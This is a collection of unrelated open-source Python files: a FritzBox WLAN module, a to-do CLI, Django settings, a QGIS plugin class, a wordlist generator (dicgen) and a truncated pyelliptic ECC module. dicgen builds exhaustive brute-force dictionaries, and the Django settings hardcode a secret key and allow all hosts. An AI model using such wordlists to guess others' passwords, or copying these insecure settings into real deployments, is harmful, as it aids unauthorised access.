kbr/fritzconnection | fritzconnection/lib/fritzwlan.py | 1 | 4692 | """
Module to get informations about WLAN devices.
"""
# This module is part of the FritzConnection package.
# https://github.com/kbr/fritzconnection
# License: MIT (https://opensource.org/licenses/MIT)
# Author: Bernd Strebel, Klaus Bremer
import itertools
from ..core.exceptions import FritzServiceError
from .fritzbase import AbstractLibraryBase
# important: don't set an extension number here:
SERVICE = 'WLANConfiguration'
class FritzWLAN(AbstractLibraryBase):
"""
Class to list all known wlan devices. All parameters are optional.
If given, they have the following meaning: `fc` is an instance of
FritzConnection, `address` the ip of the Fritz!Box, `port` the port
to connect to, `user` the username, `password` the password,
`timeout` a timeout as floating point number in seconds, `use_tls` a
boolean indicating to use TLS (default False). The *service*
parameter specifies the configuration in use. Typically this is 1
for 2.4 GHz, 2 for 5 GHz and 3 for a guest network. This can vary
depending on the router model and change with future standards.
"""
def __init__(self, *args, service=1, **kwargs):
super().__init__(*args, **kwargs)
self.service = service
def _action(self, actionname, **kwargs):
service = f'{SERVICE}{self.service}'
return self.fc.call_action(service, actionname, **kwargs)
@property
def host_number(self):
"""
Number of registered wlan devices for the active
WLANConfiguration.
"""
result = self._action('GetTotalAssociations')
return result['NewTotalAssociations']
@property
def total_host_number(self):
"""
Total NewAssociatedDeviceIndexumber of registered wlan devices
for all WLANConfigurations.
"""
total = 0
_service = self.service
for service in itertools.count(1):
self.service = service
try:
total += self.host_number
except FritzServiceError:
break
self.service = _service
return total
@property
def ssid(self):
"""The WLAN SSID"""
result = self._action('GetSSID')
return result['NewSSID']
@ssid.setter
def ssid(self, value):
self._action('SetSSID', NewSSID=value)
@property
def channel(self):
"""The WLAN channel in use"""
return self.channel_infos()['NewChannel']
@property
def alternative_channels(self):
"""Alternative channels (as string)"""
return self.channel_infos()['NewPossibleChannels']
def channel_infos(self):
"""
Return a dictionary with the keys *NewChannel* and
*NewPossibleChannels* indicating the active channel and
alternative ones.
"""
return self._action('GetChannelInfo')
def set_channel(self, number):
"""
Set a new channel. *number* must be a valid channel number for
the active WLAN. (Valid numbers are listed by *alternative_channels*.)
"""
self._action('SetChannel', NewChannel=number)
def get_generic_host_entry(self, index):
"""
Return a dictionary with informations about the device
internally stored at the position 'index'.
"""
result = self._action(
'GetGenericAssociatedDeviceInfo',
NewAssociatedDeviceIndex=index
)
return result
def get_specific_host_entry(self, mac_address):
"""
Return a dictionary with informations about the device
with the given 'mac_address'.
"""
result = self._action(
'GetSpecificAssociatedDeviceInfo',
NewAssociatedDeviceMACAddress=mac_address
)
return result
def get_hosts_info(self):
"""
Returns a list of dictionaries with information about the known hosts.
The dict-keys are: 'service', 'index', 'status', 'mac', 'ip', 'signal', 'speed'
"""
informations = []
for index in itertools.count():
try:
host = self.get_generic_host_entry(index)
except IndexError:
break
informations.append({
'service': self.service,
'index': index,
'status': host['NewAssociatedDeviceAuthState'],
'mac': host['NewAssociatedDeviceMACAddress'],
'ip': host['NewAssociatedDeviceIPAddress'],
'signal': host['NewX_AVM-DE_SignalStrength'],
'speed': host['NewX_AVM-DE_Speed']
})
return informations
| mit | -4,079,132,736,566,051,000 | 31.811189 | 87 | 0.610827 | false |
wangjun/dodo-1 | dodo.py | 1 | 12198 | #!/usr/bin/env python
import argparse
import calendar
import json
import re
import time
import os
import sys
from datetime import datetime
from time import mktime
DODO_FILE = os.path.join(os.getcwd(), 'DODO')
VERSION = "0.99"
class TerminalColors(object):
"""
Color class for listing out dodos
"""
HEADER = '\033[95m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
def __init__(self):
pass
statuses = {
'+': 'add',
'*': 'accepted',
'-': 'rejected',
'#': 'working',
'.': 'complete'
}
def pretty_date(date_string):
timestamp = calendar.timegm((datetime.strptime(date_string, "%d-%m-%y %H:%M")).timetuple())
date = datetime.fromtimestamp(timestamp)
diff = datetime.now() - date
s = diff.seconds
if diff.days > 7 or diff.days < 0:
return date.strftime('%d %b %y')
elif diff.days == 1:
return '1 day ago'
elif diff.days > 1:
return '{} days ago'.format(diff.days)
elif s <= 1:
return 'just now'
elif s < 60:
return '{} seconds ago'.format(s)
elif s < 120:
return '1 minute ago'
elif s < 3600:
return '{} minutes ago'.format(s/60)
elif s < 7200:
return '1 hour ago'
else:
return '{} hours ago'.format(s/3600)
def parse_dodo(line):
if line:
do_id = re.search("#\d+", line).group()[1:]
do_status = re.search(r'\[\[\W+\]\]', line).group()[2:-2]
do_time = re.search(r'(<<.+>>)', line)
do_description = re.search(r'({{.+}})', line)
if do_time:
do_time = do_time.group().replace("<<", "").replace(">>", "")
do_user = re.search(r'(\(\(.+\)\))', line)
if do_user:
do_user = do_user.group().replace("((", "").replace("))", "")
if do_description:
do_description = do_description.group().replace("{{", "").replace("}}", "")
return {
"id": do_id,
"time": do_time,
"user": do_user,
"status": do_status,
"description": do_description
}
def dodo_load(args):
global DODO_FILE
do_dict = {}
DODO_FILE = args.file or DODO_FILE
with open(DODO_FILE, 'r') as file_inst:
contents = file_inst.readlines()
for content in contents:
do_data = parse_dodo(content)
do_dict.update({do_data["id"]: do_data})
return do_dict
def dodo_unload(final_do_base):
content = ""
for key, value in sorted(iter(final_do_base.items()), key=lambda key_value: int(key_value[0])):
content += "#%s [[%s]] <<%s>> ((%s)) {{%s}}\n" % (value["id"], value["status"], value["time"],
value["user"], value["description"])
dodo_write(content, "w")
def dodo_init(args):
file_name = args.file or DODO_FILE
try:
try:
open(file_name, "r")
print("DoDo already exist.")
except IOError:
file_inst = open(file_name, "w")
file_inst.close()
print("Successfully initialized DoDo")
except IOError:
print("Cannot create file in the following location: %s" % file_name)
def dodo_write(content, mode="a"):
global DODO_FILE, do_base
file_inst = open(DODO_FILE, mode)
file_inst.write(content)
file_inst.close()
dodo_list()
def dodo_new_id ():
if len (do_base) == 0:
return "1"
else:
return str(max(int(id) for id in do_base.keys()) + 1)
def dodo_change_status(args, mod_do_base, status):
if not args.id:
print("ID (-id) can't be empty. May be try creating the task first")
return
do_entry = mod_do_base.get(args.id)
if do_entry:
do_entry["status"] = status
if args.desc:
do_entry["description"] = args.desc
if args.user:
do_entry["user"] = args.user
if args.time:
do_entry["time"] = args.time
else:
if not args.desc:
print("Description (-d) can't be empty")
return
do_id = dodo_new_id ()
do_description = args.desc
do_user = args.user
do_time = args.time or time.strftime("%d-%m-%y %H:%M", time.gmtime())
mod_do_base[do_id] = {
"id": do_id,
"time": do_time,
"user": do_user,
"status": status,
"description": do_description
}
dodo_unload(mod_do_base)
return
def dodo_add(args):
"""
+ add/proposed
* accepted
- rejected
# working
. complete
"""
do_user = args.user
if args.operation in ["add", "propose", "c"]:
if args.id:
print("Error: DoDo assigns id for you.")
exit()
do_id = dodo_new_id ()
do_description = args.desc
do_time = args.time or time.strftime("%d-%m-%y %H:%M", time.gmtime())
do_base[do_id] = {
"id": do_id,
"time": do_time,
"user": do_user,
"status": "+",
"description": do_description
}
dodo_unload(do_base)
elif args.operation == "accept":
dodo_change_status(args, do_base, "*")
elif args.operation == "reject":
dodo_change_status(args, do_base, "-")
elif args.operation == "workon":
dodo_change_status(args, do_base, "#")
elif args.operation == "finish":
dodo_change_status(args, do_base, ".")
elif args.operation in ["remove" or "d"]:
try:
do_base.pop(args.id)
except KeyError:
print("No task with id %s" % args.id)
dodo_unload(do_base)
elif args.operation == "flush":
for do_entry in list(do_base.values()):
if do_entry["status"] in ["-", "."]:
do_base.pop(do_entry["id"])
dodo_unload(do_base)
return
def dodo_list():
global do_base
print("%s%sID\tStatus\t\tDate(-t)\tOwner(-u)\t\tDescription (-d)\n%s" % (TerminalColors.BOLD,
TerminalColors.UNDERLINE,
TerminalColors.END))
for key, value in sorted(iter(do_base.items()), key=lambda key_value1: int(key_value1[0])):
color = TerminalColors.YELLOW
if value["status"] == ".":
color = TerminalColors.GREEN
elif value["status"] in ["-", 'x']:
color = TerminalColors.RED
elif value["status"] == "#":
color = TerminalColors.UNDERLINE + TerminalColors.YELLOW
elif value["status"] == "+":
color = TerminalColors.BLUE
user = value["user"] if value["user"] != "None" else "anonymous"
human_time = pretty_date(value["time"])
print("%s%s\t[%s]\t\t%s\t(%s)\t\t%s%s" % (color, value["id"], value["status"], human_time,
user, value["description"], TerminalColors.END))
print("\n%sAvailable Operations: c accept propose reject workon finish remove d flush\n" \
"Available Options: -id -d(description) -u(user) -t(time) -f(file)\n" \
"Status: + proposed - rejected * accepted # working . complete%s" % (
TerminalColors.BOLD, TerminalColors.END))
def dodo_import(args):
"""
Sample import JSON format (same as taskwarrior export format)
{"id":1,"description":"Read Docs Now","entry":"20150405T020324Z","status":"pending",
"uuid":"1ac1893d-db66-40d7-bf67-77ca7c51a3fc","urgency":"0"}
"""
do_user = args.user
json_file = args.input
json_source = json.loads(open(json_file).read())
for task in json_source:
do_id = dodo_new_id ()
do_description = task["description"]
utc_time = time.strptime(task["entry"], "%Y%m%dT%H%M%S%fZ")
do_time = time.strftime("%d-%m-%y %H:%M", utc_time)
do_status = "+"
if task["status"] == "pending":
do_status = "+"
if task["status"] == "completed":
do_status = "."
do_base[do_id] = {
"id": do_id,
"time": do_time,
"user": do_user,
"status": do_status,
"description": do_description
}
dodo_unload(do_base)
print("Imported %d tasks successfully" % len(json_source))
def dodo_export(args):
"""
{"id":1,"description":"Read Docs Now","entry":"20150405T020324Z","status":"pending",
"uuid":"1ac1893d-db66-40d7-bf67-77ca7c51a3fc","urgency":"0"}
Time is in UTC
"""
dodo_data = []
for instance in sorted(list(do_base.values()), key=lambda value: int(value["id"])):
dodo_data.append({
"id": instance["id"],
"time": instance["time"],
"user": instance["user"],
"status": statuses[instance["status"]],
"description": instance["description"]
}
)
if args.output:
try:
file_name = args.output
file_inst = open(file_name, "w")
file_inst.write(json.dumps(dodo_data))
file_inst.close()
print("%sExported DODO to %s%s" % \
(TerminalColors.GREEN, file_name, TerminalColors.END))
except IOError:
print("%sExport failed; Check for permission to create/edit %s%s" % \
(TerminalColors.RED, args.output, TerminalColors.END))
else:
print("%sUse -e or --export to <filename.json> to export to a file.%s" % \
(TerminalColors.YELLOW, TerminalColors.END))
print("%s" % TerminalColors.GREEN)
print(dodo_data)
print("%s" % TerminalColors.END)
def dodo_switch(args):
global do_base
if args.operation == "init":
dodo_init(args)
elif args.operation in ['add', 'propose', 'accept', 'reject', 'workon', 'finish', 'flush', 'remove', "c", "d"]:
dodo_add(args)
elif args.operation == 'import':
dodo_import(args)
elif args.operation == 'export':
dodo_export(args)
else:
dodo_list()
if __name__ == "__main__":
default_operation = 'list'
default_user = os.path.split(os.path.expanduser('~'))[-1]
parser = argparse.ArgumentParser()
parser.add_argument("operation", nargs='?', default=default_operation,
choices=[
'accept',
'add',
'finish',
'flush',
'list',
'propose',
'reject',
'remove',
'workon'
],
help="The operation to perform")
parser.add_argument("quick_access", nargs='?', default='',
help="Task ID for a operation or Description for the new task")
parser.add_argument("-d", "--desc", "--description",
help="Task Description")
parser.add_argument("-u", "--user", default=default_user, help="User ID")
parser.add_argument("-t", "--time",
help="Expected/Completed Date - 11-03-2015")
parser.add_argument("--id", help="List all existing dodos")
parser.add_argument("-f", "--file", help="DODO filename")
parser.add_argument("-i", "--input", help="Import from JSON file")
parser.add_argument("-o", "--output", help="Export to JSON file")
arguments = parser.parse_args()
if (arguments.operation == default_operation
and not os.path.isfile(arguments.file or DODO_FILE)):
parser.print_help()
sys.exit(0)
quick_access = arguments.quick_access
if quick_access:
if arguments.quick_access.isdigit():
arguments.id = quick_access
elif quick_access:
arguments.desc = quick_access
global do_base
do_base = {}
if arguments.operation == "init":
dodo_init(arguments)
else:
do_base = dodo_load(arguments)
dodo_switch(arguments)
| bsd-3-clause | 7,399,795,372,359,604,000 | 32.237057 | 115 | 0.523364 | false |
slapec/yaat | dev/yaat/settings.py | 1 | 2472 | #
#
# Most stuff has been disabled.
# See: INSTALLED_APPS, MIDDLEWARE_CLASSES, DATABASES
#
#
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
STATIC_URL = '/yatable/'
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '+eyduytyp4o(p+ve6-ko==gfnz^m0&k&wymjjt#hev074p43m6'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
# 'django.contrib.admin',
# 'django.contrib.auth',
'django.contrib.contenttypes',
# 'django.contrib.sessions',
# 'django.contrib.messages',
'django.contrib.staticfiles',
'yatable'
)
MIDDLEWARE_CLASSES = (
# 'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
# 'django.middleware.csrf.CsrfViewMiddleware',
# 'django.contrib.auth.middleware.AuthenticationMiddleware',
# 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
# 'django.contrib.messages.middleware.MessageMiddleware',
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
# 'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'yaat.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
# 'django.contrib.auth.context_processors.auth',
# 'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'yaat.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
# }
# }
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
| mit | 893,957,678,182,100,600 | 24.484536 | 72 | 0.673139 | false |
lcoandrade/DsgTools | core/ServerManagementTools/earthCoverageManager.py | 1 | 3653 | # -*- coding: utf-8 -*-
"""
/***************************************************************************
DsgTools
A QGIS plugin
Brazilian Army Cartographic Production Tools
-------------------
begin : 2017-02-24
git sha : $Format:%H$
copyright : (C) 2017 by Philipe Borba - Cartographic Engineer @ Brazilian Army
email : [email protected]
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
#General imports
from osgeo import ogr
from uuid import uuid4
import codecs, os, json, binascii
#DSG Tools imports
from DsgTools.core.Factories.DbFactory.dbFactory import DbFactory
from DsgTools.core.ServerManagementTools.genericDbManager import GenericDbManager
from DsgTools.core.Utils.utils import Utils
#qgis.PyQt imports
from qgis.PyQt.Qt import QObject
class EarthCoverageManager(GenericDbManager):
"""
This class manages the customizations on dsgtools databases.
"""
def __init__(self, serverAbstractDb, dbDict, edgvVersion, parentWidget = None):
super(self.__class__,self).__init__(serverAbstractDb, dbDict, edgvVersion, parentWidget = None)
def materializeIntoDatabase(self, abstractDb, propertyDict):
"""
Method that is reimplemented in each child when installing a property involves changing any sort of database structure
"""
jsonDict = self.utils.instantiateJsonDict(propertyDict['jsondict'])
abstractDb.createCentroidAuxStruct(list(jsonDict['earthCoverageDict'].keys()), useTransaction = False)
def updateMaterializationFromDatabase(self, abstractDb, propertyDict, oldPropertyDict):
"""
Method that is reimplemented in each child when updating a property involves changing any sort of database structure
"""
newJsonDict = self.utils.instantiateJsonDict(propertyDict['jsondict'])
oldJsonDict = self.utils.instantiateJsonDict(oldPropertyDict['jsondict'])
abstractDb.updateEarthCoverageDict(newJsonDict, oldJsonDict, useTransaction = True)
def undoMaterializationFromDatabase(self, abstractDb, propertyName, settingType, edgvVersion):
"""
Method that is reimplemented in each child when uninstalling a property involves changing any sort of database structure
"""
jsonDict = self.utils.instantiateJsonDict(abstractDb.getRecordFromAdminDb(settingType, propertyName, edgvVersion)['jsondict'])
abstractDb.dropCentroids(list(jsonDict['earthCoverageDict'].keys()), useTransaction = False)
def hasStructuralChanges(self, dbNameList):
"""
Method that is reimplemented in each child
"""
structuralChanges = []
for dbName in dbNameList:
abstractDb = self.instantiateAbstractDb(dbName)
if abstractDb.checkCentroidAuxStruct():
structuralChanges.append(dbName)
return structuralChanges
| gpl-2.0 | -2,215,078,940,906,647,600 | 48.364865 | 134 | 0.594032 | false |
ualvesdias/dicgen | dicgen.py | 1 | 2243 | #!/usr/bin/env python
import itertools as it
import sys
import progressbar as pb
from time import time, ctime
# The generator itself
def generator(string,minLen,maxLen,prevCount):
count = 0
bar = pb.ProgressBar(maxval = prevCount).start()
# This for loops from the min length to the max
for length in range(minLen,maxLen+1):
# This for computes each combination and writes it into the file
for perm in it.product(string, repeat=length):
outFile.write(str(''.join(perm)))
outFile.write('\n')
count += 1
bar.update(count)
# The main function. It shows the number of lines
# that will be created, as well as the filesize.
# It also calls the generator and shows the result in the screen
def main():
# var declarations
global outputFile, outFile
prevCount = 0
prevSize = 0
# Calculates the preview numbers
for ln in range(minLen, maxLen+1):
prevCount += len(string)**ln
prevSize += prevCount * ln
# Filesize in MB, GB and PB
mByte = prevSize / (1024**2)
gByte = mByte / 1024
tByte = gByte / 1024
pByte = tByte / 1024
print("Attention!")
print("Size in MB: %.2f" % mByte)
print("Size in GB: %.2f" % gByte)
print("Size in TB: %.2f" % tByte)
print("Size in PB: %.2f" % pByte)
print("\ndicgen is about to generate a file with %i lines." % prevCount)
while True:
# Confirmation
proceed = raw_input('Are you sure you want to proceed?\n[Y]es [N]o: ')
if proceed.lower() == 'y' or proceed.lower() == 'yes':
print("Initiating operation...")
outFile = open(outputFile,'w')
startTime = time()
print("Start time: %s" % ctime(startTime))
generator(string,minLen,maxLen,prevCount)
endTime = time()
print("Done.\nEnd time: %s" % ctime(endTime))
print("Total operation time: %.2f seconds." % (float(endTime - startTime)))
print("The file %s is ready to be used." % outputFile)
break
elif proceed.lower() == 'n' or proceed.lower() == 'no':
print('Aborting...')
break
else:
print('Please, type yes or no.')
if __name__ == "__main__":
try:
string = sys.argv[1]
minLen = int(sys.argv[2])
maxLen = int(sys.argv[3])
outputFile = sys.argv[4]
except:
print("Usage: python dicgen.py <characters> <min-range> <max-range> <output-file>")
sys.exit(1)
main()
| gpl-3.0 | 6,836,051,558,800,038,000 | 28.12987 | 85 | 0.666964 | false |
krstnschwpwr/speedcontrol | speed_ctrl/settings.py | 1 | 2616 | import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'jfwya!*^^@unv%s$-#-#us9x6z%1ym!uvspde2zu#unrp&(gos'
if 'SPEEDTRACKER_ENV' in os.environ and os.environ['SPEEDTRACKER_ENV'] == 'production':
DEBUG = False
ALLOWED_HOSTS = ['*']
else:
DEBUG = True
ALLOWED_HOSTS = []
INSTALLED_APPS = [
'probe.apps.ProbeConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'speed_ctrl.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'probe/templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'speed_ctrl.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databasespip
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'speed.sqlite'),
}
}
REST_FRAMEWORK = {
'DEFAULT_RENDERER_CLASSES': (
'probe.renderers.PrtgRenderer',
'rest_framework.renderers.JSONRenderer',
)
}
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
LANGUAGE_CODE = 'en-gb'
TIME_ZONE = 'Europe/Berlin'
USE_I18N = True
USE_L10N = True
USE_TZ = True
STATIC_URL = '/static/'
| mit | -2,287,553,738,804,210,000 | 25.424242 | 91 | 0.652905 | false |
virginiacc/owning-a-home | src/_lib/wordpress_journey_processor.py | 1 | 2377 | import sys
import json
import os.path
import requests
import dateutil.parser
def posts_at_url(url):
current_page = 1
max_page = sys.maxint
while current_page <= max_page:
url = os.path.expandvars(url)
resp = requests.get(url, params={'page':current_page, 'count': '-1'})
results = json.loads(resp.content)
current_page += 1
max_page = results['pages']
for p in results['posts']:
yield p
def documents(name, url, **kwargs):
for post in posts_at_url(url):
yield process_journey(post)
def process_journey(item):
del item['comments']
del item['date']
custom_fields = item['custom_fields']
item['_id'] = item['slug']
if item['parent'] != 0:
# This is a step item
item['has_parent'] = True
if custom_fields.get('what_to_know'):
item['what_to_know'] = custom_fields['what_to_know'][0]
if custom_fields.get('how_to_take_action'):
item['how_to_take_action'] = \
custom_fields['how_to_take_action'][0]
if custom_fields.get('key_tool'):
key_tool = {}
key_tool['url'] = custom_fields['key_tool'][0]
key_tool['text'] = custom_fields['key_tool'][1]
item['key_tool'] = key_tool
else:
# This is a phase item
item['has_parent'] = False
# create list of tools
item['tools'] = []
for x in xrange(0,2):
tool = {}
fields = ['description', 'link']
for field in fields:
field_name = 'tools_%s_%s' % (str(x), field)
if field_name in custom_fields:
if field == 'link':
tool['url'] = custom_fields[field_name][0]
tool['text'] = custom_fields[field_name][1]
else:
tool[field] = custom_fields[field_name][0]
if tool:
item['tools'].append(tool)
# create list of milestones
milestones = []
for x in xrange(0,3):
key = 'milestones_%s_milestone' % x
if key in custom_fields:
milestones.append(custom_fields[key][0])
if milestones:
item['milestones'] = milestones
return item
| cc0-1.0 | 1,026,639,759,227,327,500 | 28.7125 | 77 | 0.506521 | false |
bashrc/zeronet-debian | src/src/lib/pyelliptic/ecc.py | 1 | 18500 | #!/usr/bin/python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2011 Yann GUIBET <[email protected]>
# See LICENSE for details.
from hashlib import sha512
from .openssl import OpenSSL
from .cipher import Cipher
from .hash import hmac_sha256, equals
from struct import pack, unpack
class ECC:
"""
Asymmetric encryption with Elliptic Curve Cryptography (ECC)
ECDH, ECDSA and ECIES
import pyelliptic
alice = pyelliptic.ECC() # default curve: sect283r1
bob = pyelliptic.ECC(curve='sect571r1')
ciphertext = alice.encrypt("Hello Bob", bob.get_pubkey())
print bob.decrypt(ciphertext)
signature = bob.sign("Hello Alice")
# alice's job :
print pyelliptic.ECC(
pubkey=bob.get_pubkey()).verify(signature, "Hello Alice")
# ERROR !!!
try:
key = alice.get_ecdh_key(bob.get_pubkey())
except: print("For ECDH key agreement,\
the keys must be defined on the same curve !")
alice = pyelliptic.ECC(curve='sect571r1')
print alice.get_ecdh_key(bob.get_pubkey()).encode('hex')
print bob.get_ecdh_key(alice.get_pubkey()).encode('hex')
"""
def __init__(self, pubkey=None, privkey=None, pubkey_x=None,
pubkey_y=None, raw_privkey=None, curve='sect283r1'):
"""
For a normal and High level use, specifie pubkey,
privkey (if you need) and the curve
"""
if type(curve) == str:
self.curve = OpenSSL.get_curve(curve)
else:
self.curve = curve
if pubkey_x is not None and pubkey_y is not None:
self._set_keys(pubkey_x, pubkey_y, raw_privkey)
elif pubkey is not None:
curve, pubkey_x, pubkey_y, i = ECC._decode_pubkey(pubkey)
if privkey is not None:
curve2, raw_privkey, i = ECC._decode_privkey(privkey)
if curve != curve2:
raise Exception("Bad ECC keys ...")
self.curve = curve
self._set_keys(pubkey_x, pubkey_y, raw_privkey)
else:
self.privkey, self.pubkey_x, self.pubkey_y = self._generate()
def _set_keys(self, pubkey_x, pubkey_y, privkey):
if self.raw_check_key(privkey, pubkey_x, pubkey_y) < 0:
self.pubkey_x = None
self.pubkey_y = None
self.privkey = None
raise Exception("Bad ECC keys ...")
else:
self.pubkey_x = pubkey_x
self.pubkey_y = pubkey_y
self.privkey = privkey
@staticmethod
def get_curves():
"""
static method, returns the list of all the curves available
"""
return OpenSSL.curves.keys()
def get_curve(self):
return OpenSSL.get_curve_by_id(self.curve)
def get_curve_id(self):
return self.curve
def get_pubkey(self):
"""
High level function which returns :
curve(2) + len_of_pubkeyX(2) + pubkeyX + len_of_pubkeyY + pubkeyY
"""
return b''.join((pack('!H', self.curve),
pack('!H', len(self.pubkey_x)),
self.pubkey_x,
pack('!H', len(self.pubkey_y)),
self.pubkey_y
))
def get_privkey(self):
"""
High level function which returns
curve(2) + len_of_privkey(2) + privkey
"""
return b''.join((pack('!H', self.curve),
pack('!H', len(self.privkey)),
self.privkey
))
@staticmethod
def _decode_pubkey(pubkey):
i = 0
curve = unpack('!H', pubkey[i:i + 2])[0]
i += 2
tmplen = unpack('!H', pubkey[i:i + 2])[0]
i += 2
pubkey_x = pubkey[i:i + tmplen]
i += tmplen
tmplen = unpack('!H', pubkey[i:i + 2])[0]
i += 2
pubkey_y = pubkey[i:i + tmplen]
i += tmplen
return curve, pubkey_x, pubkey_y, i
@staticmethod
def _decode_privkey(privkey):
i = 0
curve = unpack('!H', privkey[i:i + 2])[0]
i += 2
tmplen = unpack('!H', privkey[i:i + 2])[0]
i += 2
privkey = privkey[i:i + tmplen]
i += tmplen
return curve, privkey, i
def _generate(self):
try:
pub_key_x = OpenSSL.BN_new()
pub_key_y = OpenSSL.BN_new()
key = OpenSSL.EC_KEY_new_by_curve_name(self.curve)
if key == 0:
raise Exception("[OpenSSL] EC_KEY_new_by_curve_name FAIL ...")
if (OpenSSL.EC_KEY_generate_key(key)) == 0:
raise Exception("[OpenSSL] EC_KEY_generate_key FAIL ...")
if (OpenSSL.EC_KEY_check_key(key)) == 0:
raise Exception("[OpenSSL] EC_KEY_check_key FAIL ...")
priv_key = OpenSSL.EC_KEY_get0_private_key(key)
group = OpenSSL.EC_KEY_get0_group(key)
pub_key = OpenSSL.EC_KEY_get0_public_key(key)
if (OpenSSL.EC_POINT_get_affine_coordinates_GFp(group, pub_key,
pub_key_x,
pub_key_y, 0
)) == 0:
raise Exception(
"[OpenSSL] EC_POINT_get_affine_coordinates_GFp FAIL ...")
privkey = OpenSSL.malloc(0, OpenSSL.BN_num_bytes(priv_key))
pubkeyx = OpenSSL.malloc(0, OpenSSL.BN_num_bytes(pub_key_x))
pubkeyy = OpenSSL.malloc(0, OpenSSL.BN_num_bytes(pub_key_y))
OpenSSL.BN_bn2bin(priv_key, privkey)
privkey = privkey.raw
OpenSSL.BN_bn2bin(pub_key_x, pubkeyx)
pubkeyx = pubkeyx.raw
OpenSSL.BN_bn2bin(pub_key_y, pubkeyy)
pubkeyy = pubkeyy.raw
self.raw_check_key(privkey, pubkeyx, pubkeyy)
return privkey, pubkeyx, pubkeyy
finally:
OpenSSL.EC_KEY_free(key)
OpenSSL.BN_free(pub_key_x)
OpenSSL.BN_free(pub_key_y)
def get_ecdh_key(self, pubkey):
"""
High level function. Compute public key with the local private key
and returns a 512bits shared key
"""
curve, pubkey_x, pubkey_y, i = ECC._decode_pubkey(pubkey)
if curve != self.curve:
raise Exception("ECC keys must be from the same curve !")
return sha512(self.raw_get_ecdh_key(pubkey_x, pubkey_y)).digest()
def raw_get_ecdh_key(self, pubkey_x, pubkey_y):
try:
ecdh_keybuffer = OpenSSL.malloc(0, 32)
other_key = OpenSSL.EC_KEY_new_by_curve_name(self.curve)
if other_key == 0:
raise Exception("[OpenSSL] EC_KEY_new_by_curve_name FAIL ...")
other_pub_key_x = OpenSSL.BN_bin2bn(pubkey_x, len(pubkey_x), 0)
other_pub_key_y = OpenSSL.BN_bin2bn(pubkey_y, len(pubkey_y), 0)
other_group = OpenSSL.EC_KEY_get0_group(other_key)
other_pub_key = OpenSSL.EC_POINT_new(other_group)
if (OpenSSL.EC_POINT_set_affine_coordinates_GFp(other_group,
other_pub_key,
other_pub_key_x,
other_pub_key_y,
0)) == 0:
raise Exception(
"[OpenSSL] EC_POINT_set_affine_coordinates_GFp FAIL ...")
if (OpenSSL.EC_KEY_set_public_key(other_key, other_pub_key)) == 0:
raise Exception("[OpenSSL] EC_KEY_set_public_key FAIL ...")
if (OpenSSL.EC_KEY_check_key(other_key)) == 0:
raise Exception("[OpenSSL] EC_KEY_check_key FAIL ...")
own_key = OpenSSL.EC_KEY_new_by_curve_name(self.curve)
if own_key == 0:
raise Exception("[OpenSSL] EC_KEY_new_by_curve_name FAIL ...")
own_priv_key = OpenSSL.BN_bin2bn(
self.privkey, len(self.privkey), 0)
if (OpenSSL.EC_KEY_set_private_key(own_key, own_priv_key)) == 0:
raise Exception("[OpenSSL] EC_KEY_set_private_key FAIL ...")
